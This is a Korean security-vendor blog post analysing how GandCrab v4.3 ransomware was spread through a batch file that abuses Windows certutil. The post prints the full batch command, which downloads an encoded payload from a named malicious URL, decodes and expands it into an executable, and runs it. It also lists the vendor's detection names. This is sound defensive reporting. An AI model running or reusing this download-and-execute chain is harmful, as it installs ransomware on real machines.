안랩 ASEC은 9월 6일 배치파일(*.bat) 형태로 유포되는 Gandcrab v4.3을 발견하였다. 이 배치파일은 certutil 이라는 윈도우즈 기본 명령을 이용해 동작한다.
동작하는 과정은 먼저 특정 URL에서 파일을 다운로드 받는다. 다운로드 받은 바이너리는 서명 파일인것처럼 위장한 BASE64형태로 인코딩 되어있다. 그리고 -decode 옵션을 이용해 Base64 디코드 후 cab 파일로 저장한다. cab파일은 압축 파일로 -expand 옵션으로 압축해제 후 실행하면 Gandcrab 랜섬웨어가 실행된다.
[그림-1] 동작 방식
certutil -urlcache -split -f http://files.occarlsongracieteams.com/x/gate.php %TMP%\ercg345c24.txt > NUL && certutil -decode %TMP%\ercg345c24.txt %TMP%\ercg345c24.cab > NUL && expand %TMP%\ercg345c24.cab %TMP%\ercg345c24.exe && %TMP%\ercg345c24.exe del %TMP%\ercg345c24.txt & del %TMP%\ercg345c24.cab
[표-1] 배치파일(.bat) 명령
이번 Gandcrab은 유포방법 뿐 아니라 외형에서도 새로운 점이 있다. 기존에 주로 사용하던 Microsoft Visual Cpp 8.0/9.0 컴파일러가 아닌 NullSoft Installer 형태로 인젝션하여 동작한다.
현재 안랩 제품에서는 배치파일 및 Gandcrab 랜섬웨어를 다음과 같이 진단하고 있다.
|
배치파일(*.bat) |
BAT/Gandcrab (2018.09.07.00) |
|
다운로드 파일 (*.txt) |
BinImage/Gandcrab (2018.09.07.00) |
|
랜섬웨어 실행파일 (.exe) |
Trojan/Win32.Gandcrab.C2698070 (2018.09.06.06) Malware/MDP.Ransom.1785 |
'악성코드 정보' 카테고리의 다른 글
| .SAVEfiles 확장자로 암호화 하는 신종 랜섬웨어 발견 (0) | 2018.09.11 |
|---|---|
| PDF 파일에 첨부되어 유포 중인 악성코드 (*.pub, *.iqy) (0) | 2018.09.10 |
| 구글 한국어 웹 검색 시 노출되는 GandCrab 유포 자바스크립트 (0) | 2018.09.06 |
| 특정 타겟을 목표로 유포되는 피싱공격 (0) | 2018.09.05 |
| 파워쉘을 이용하여 유포 중인 GandCrab v4.4 (Kill-Switch) (1) | 2018.09.03 |
댓글